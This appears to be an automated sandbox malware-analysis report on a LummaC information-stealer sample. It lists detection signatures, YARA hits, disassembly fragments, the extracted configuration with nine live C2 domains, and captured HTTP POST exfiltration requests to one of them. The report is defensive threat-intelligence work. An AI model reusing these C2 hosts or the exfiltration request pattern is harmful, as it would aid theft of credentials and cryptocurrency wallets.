Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1466292
MD5:	2f694c5080f96479f2bea3f4d07200f1
SHA1:	e67d58f0003e4506711c76e82915ba4f7d53b893
SHA256:	60ec2c168365bcd32ac7a7ae6ad0d1fea4cc948590ac0ed7c621599f256964a0
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2F694C5080F96479F2BEA3F4D07200F1)

WerFault.exe (PID: 4444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "stationacutwo.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x16a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1724865507.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1776086963.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3696	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 3696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3696	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 23 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.3.file.exe.4430000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "stationacutwo.shop"], "Build id": "P6Mk0M--key"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: benchillppwo.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: publicitttyps.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: answerrsdo.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: radiationnopp.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: affecthorsedpo.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bargainnykwo.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bannngwko.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bouncedgowp.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: stationacutwo.shop
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: P6Mk0M--key

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041718B CryptUnprotectData,

0_2_0041718B

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_0041003F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	0_2_00427141
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_00410950
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041718B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+68h]	0_2_00418192
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00418192
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	0_2_0041B260
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_00416380
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_00416380
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_00418C50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E4AA2089h	0_2_00421570
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_0040A660
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_0041773E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add edi, 02h	0_2_0041773E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0041773E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_0041773E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h	0_2_0041107B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000574h]	0_2_004260F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], dl	0_2_004260F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc esi	0_2_0043A090
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0041289B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_004390BE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_00436162
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [esp+58h]	0_2_00425920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, esi	0_2_00425920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+000000B8h], 00000000h	0_2_00413985
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_004399A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc esi	0_2_004399A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_004269B6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_00426A5F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_00416210
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004242B2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_00438351
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00403BC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	0_2_0040CBCC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	0_2_004143D3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_004383E3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00431B90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00417C74
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_00438C15
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_00421C19
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, esi	0_2_004234DC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, edi	0_2_0043A480
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_00421C8F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00417C90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B33E16A3h	0_2_00415CA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00401D64
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00426660
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_00439E00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc esi	0_2_00439E00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_00402E80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00425680
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 00D23749h	0_2_0041D75D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_0041D75D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_0041D75D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [004434ECh]	0_2_0041D75D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_00439F10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc esi	0_2_00439F10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0040E7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec edi	0_2_0041FF85
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_0041FF85
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec ebx	0_2_0041FF85
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [004434ECh]	0_2_043FE403
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_043F6477
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_043FDA94
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc esi	0_2_0441A4B1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	0_2_043FB4C7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_04400510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec ebx	0_2_04400510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_04404519
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_044185B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	0_2_043F463A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_0441864A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, esi	0_2_04403743
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_043F6739
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_043F772D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E4AA2089h	0_2_044017D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_043E203D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_043E30E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_0441A21D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_043FE257
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_043F02A6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h	0_2_043F12E2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000574h]	0_2_04406357
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], dl	0_2_04406357
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_04419325
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_044163C9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_044003F4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec ebx	0_2_044003F4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+68h]	0_2_043F83F9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	0_2_044073A8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_04406C1D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_04406CC6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_04411DF7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_043E3E27
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_04418E7C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_043F8EB7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_043F7EA3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_043F7EDB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B33E16A3h	0_2_043F5F09
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_043E1F8F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_04401FBE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_044068C7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_043F6899
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_044058E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, edi	0_2_0441A88B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_043EA8C7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_044058E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 00D23749h	0_2_043FD9DB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_043EEA37
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_043F7A74
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_043F8A6E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_043FDA94
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_043F0BB7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+000000B8h], 00000000h	0_2_043F3BEC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add edi, 02h	0_2_043F7BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_043F7BE0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: benchillppwo.shop
Source: Malware configuration extractor	URLs: publicitttyps.shop
Source: Malware configuration extractor	URLs: answerrsdo.shop
Source: Malware configuration extractor	URLs: radiationnopp.shop
Source: Malware configuration extractor	URLs: affecthorsedpo.shop
Source: Malware configuration extractor	URLs: bargainnykwo.shop
Source: Malware configuration extractor	URLs: bannngwko.shop
Source: Malware configuration extractor	URLs: bouncedgowp.shop
Source: Malware configuration extractor	URLs: stationacutwo.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5436Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574980Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: stationacutwo.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: stationacutwo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stationacutwo.shop

Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
